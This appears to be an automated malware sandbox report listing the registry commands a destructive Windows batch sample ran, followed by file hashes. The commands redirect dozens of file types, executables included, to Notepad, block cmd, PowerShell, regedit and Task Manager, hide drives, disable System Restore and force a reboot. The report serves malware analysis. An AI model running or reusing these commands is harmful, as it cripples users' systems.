C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "116" /t REG_SZ /d "MicrosoftEdgeCP.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "117" /t REG_SZ /d "MicrosoftEdgeSH.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "118" /t REG_SZ /d "launcher.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "119" /t REG_SZ /d "regedit.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Windows\1.jpg /f3⤵
- Sets desktop wallpaper using registry
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\mp3file\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\mp4file\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\exefile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies system executable filetype association
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\pngfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\icofile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\pdffile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\docxfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\docfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\csvfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\hfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\cppfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\oggfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\avifile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\isofile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\zipfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\rarfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\pptfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\mkvfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\xlsxfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\jpgfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\jpegfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\tiffile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\tmpfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\dmgfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\slnfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\7zfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\afile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\aafile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\001file\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\allfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\binfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\asmfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\svgfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\bmpfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\gzfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\cabfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\cfgfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\cmdfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\comfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies system executable filetype association
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\cplfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\ctfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\curfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\dllfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\htmfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\htmlfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\wshfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\vbsfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\jsfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\logfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\wsffile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\jarfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\cplfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSecurityTab /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORD /d "67108863" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d "67108863" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFileMenu /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d "2" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v RestrictToPermittedSnapins /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d "2" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "121" /t REG_SZ /d "cmd.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "120" /t REG_SZ /d "powershell.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DisableCAD /d "0" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t REG_DWORD /v "DisableRegistryTools" /d "1" /f3⤵
-
C:\Windows\SysWOW64\shutdown.exeshutdown -r -t 203⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa3954855 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.batFilesize
848B
MD5e59c7d9f080b068e3118e81385f467e7
SHA178ea57d55558847121cb70367d10dc9c6e833a26
SHA2565c9bee6ecba73cda027b99dea013cd54f53524e35750da629f53c841d75b6e8f
SHA512b452ccd1009f7976f4ba2f44c117bf2faee0768f22e9c55e41f16d4695cdcd296f0a4321de8dc4855536b364844dffad5df0d46cb711f1c49f024e3afc043475
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\42.exeFilesize
27KB
MD5daf9159a8fbc9510e9dc380c2cae924d
SHA15e1bf2dbe567ffc04c194b31de4f4e15c630cae5
SHA25643118bc6f1c03b9f749efc244d7fd0553d45ec50ae2e4ea363e17f85f832290f
SHA51288b01d7b3f76530124f8149668879b9cf66075f228e8c3000d75383bf10c11eb43bd5c83b445b19ec24de578415a26153d3fc0d329b6dd195f09f1226a960ea8
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PkgMgr.00Filesize
28KB
MD5067ab27355743f95929213e08bc60ebb
SHA1376436cef2b119a75cf29500e3efb37061b0fa16
SHA256e621092e9b620bc589a4dd89d791352d266b139ceb9b3f13ddded5b536b52441
SHA51297add0ebcee845d1c47eef6f91d990fccc025509c748e8d612716ac2342144578f4e29247f4824aeefaf5ee143b31837fb5eb487726855ed43a42ccd14431ba0
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PkgMgr.batFilesize
28KB
MD5fed4789f3fbd52e720ae7234600d5652
SHA1273db24c6044f936359bdd272eb14c0fb2f6e117
SHA25603dfd466366ffbe32e9e487cdc2136c62b4b4f57c365e255ef8e0c36991fb8b0
SHA512ff2dc7069ea16bea767b1f9f6efa60b15cef3573a8de5e92d4766646e030f3db89fb4789cf51526b7d10d6d03b1348748d1f7c1162f7382e943261102f6d0435
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cew.00Filesize
344KB
MD59311b831777f14f7c81af8cb67259a3b
SHA18178284b89f5429f4ab6143a652944da563124c2
SHA2561479da32b193676068062236730ce9a5dbcae727ec0eea63b18252f9cb744707
SHA51286d334db1eca671d2af34786337316a6570236ad12c23fa3f84884776d550abcc6403100e17b23b97c761e97dedd8b8b135c4d49332623894c5f57a5e6eb1fc4
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cew.01Filesize
2KB
MD50f92fcbacb68fb014cfa248c31448e6b
SHA164d5dea54df6a03490849d04a174a7e8d690ebb4
SHA2568b2d86fe88a75c0e0c312fdc7d1f54d113d33af729d2be52622f2b538a7a7049
SHA51210f8f0fa7fdaede1b369e35e9bb0cf44ef7de02d4c7c3d644b5c2e80b405f9927acd167c996957e18f0a38fe41be4afdfd420bbe8a539332a93238565576236b
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\nircmd.exeFilesize
44KB
MD5a1cd6a64e8f8ad5d4b6c07dc4113c7ec
SHA160e2f48a51c061bba72a08f34be781354f87aa49
SHA256b994ae5cbfb5ad308656e9a8bf7a4a866fdeb9e23699f89f048d7f92e6bb8577
SHA51287a42901a63793653d49f1c6d410a429cabb470b4c340c4553cbd9eccacb38d8543f85455465e0a432d737e950c590175dad744094861f7c3e575446a65b41e8
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\nircmd.exeFilesize
44KB
MD5a1cd6a64e8f8ad5d4b6c07dc4113c7ec
SHA160e2f48a51c061bba72a08f34be781354f87aa49
SHA256b994ae5cbfb5ad308656e9a8bf7a4a866fdeb9e23699f89f048d7f92e6bb8577
SHA51287a42901a63793653d49f1c6d410a429cabb470b4c340c4553cbd9eccacb38d8543f85455465e0a432d737e950c590175dad744094861f7c3e575446a65b41e8
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\start.batFilesize
1KB
MD59492f33971cfd6b77484342e42097731
SHA16cce167289894928d4bc6da2e263a354cbe2b174
SHA2562f4637dd7a3125bf60d5651cc851c8ef9cf7c461dd89eed404dd9f5a381844e4
SHA512c685295c91f2765ec3e3ab72fa7c124335d4d570df418427b11c7cd96e3cad5ad8563bc114052de0ecc9d909f671f72663c72015f5415f44c67d24ca21462dcc
-
memory/116-159-0x0000000000000000-mapping.dmp
-
memory/260-158-0x0000000000000000-mapping.dmp
-
memory/332-200-0x0000000000000000-mapping.dmp
-
memory/464-179-0x0000000000000000-mapping.dmp
-
memory/568-182-0x0000000000000000-mapping.dmp
-
memory/640-155-0x0000000000000000-mapping.dmp
-
memory/652-170-0x0000000000000000-mapping.dmp
-
memory/760-149-0x0000000000000000-mapping.dmp
-
memory/1008-166-0x0000000000000000-mapping.dmp
-
memory/1044-181-0x0000000000000000-mapping.dmp
-
memory/1068-197-0x0000000000000000-mapping.dmp
-
memory/1132-185-0x0000000000000000-mapping.dmp
-
memory/1140-167-0x0000000000000000-mapping.dmp
-
memory/1272-191-0x0000000000000000-mapping.dmp
-
memory/1416-150-0x0000000000000000-mapping.dmp
-
memory/1520-180-0x0000000000000000-mapping.dmp
-
memory/1676-198-0x0000000000000000-mapping.dmp
-
memory/1688-143-0x0000000000000000-mapping.dmp
-
memory/1824-199-0x0000000000000000-mapping.dmp
-
memory/1912-154-0x0000000000000000-mapping.dmp
-
memory/2156-164-0x0000000000000000-mapping.dmp
-
memory/2192-165-0x0000000000000000-mapping.dmp
-
memory/2252-140-0x0000000000000000-mapping.dmp
-
memory/2276-138-0x0000000000000000-mapping.dmp
-
memory/2308-163-0x0000000000000000-mapping.dmp
-
memory/2364-130-0x0000000000000000-mapping.dmp
-
memory/2400-162-0x0000000000000000-mapping.dmp
-
memory/2648-161-0x0000000000000000-mapping.dmp
-
memory/2904-189-0x0000000000000000-mapping.dmp
-
memory/2928-186-0x0000000000000000-mapping.dmp
-
memory/3132-201-0x0000000000000000-mapping.dmp
-
memory/3424-188-0x0000000000000000-mapping.dmp
-
memory/3472-172-0x0000000000000000-mapping.dmp
-
memory/3492-187-0x0000000000000000-mapping.dmp
-
memory/3640-196-0x0000000000000000-mapping.dmp
-
memory/3684-195-0x0000000000000000-mapping.dmp
-
memory/4020-153-0x0000000000000000-mapping.dmp
-
memory/4128-168-0x0000000000000000-mapping.dmp
-
memory/4172-174-0x0000000000000000-mapping.dmp
-
memory/4232-202-0x0000000000000000-mapping.dmp
-
memory/4308-169-0x0000000000000000-mapping.dmp
-
memory/4312-171-0x0000000000000000-mapping.dmp
-
memory/4368-184-0x0000000000000000-mapping.dmp
-
memory/4388-190-0x0000000000000000-mapping.dmp
-
memory/4392-183-0x0000000000000000-mapping.dmp
-
memory/4408-147-0x0000000000000000-mapping.dmp
-
memory/4432-152-0x0000000000000000-mapping.dmp
-
memory/4456-177-0x0000000000000000-mapping.dmp
-
memory/4480-194-0x0000000000000000-mapping.dmp
-
memory/4536-160-0x0000000000000000-mapping.dmp
-
memory/4556-146-0x0000000000000000-mapping.dmp
-
memory/4568-176-0x0000000000000000-mapping.dmp
-
memory/4572-175-0x0000000000000000-mapping.dmp
-
memory/4608-178-0x0000000000000000-mapping.dmp
-
memory/4612-148-0x0000000000000000-mapping.dmp
-
memory/4616-156-0x0000000000000000-mapping.dmp
-
memory/4656-157-0x0000000000000000-mapping.dmp
-
memory/4764-145-0x0000000000000000-mapping.dmp
-
memory/4772-192-0x0000000000000000-mapping.dmp
-
memory/4916-193-0x0000000000000000-mapping.dmp
-
memory/5016-173-0x0000000000000000-mapping.dmp
-
memory/5028-151-0x0000000000000000-mapping.dmp
-
memory/5052-141-0x0000000000000000-mapping.dmp
-
memory/5104-139-0x0000000000000000-mapping.dmp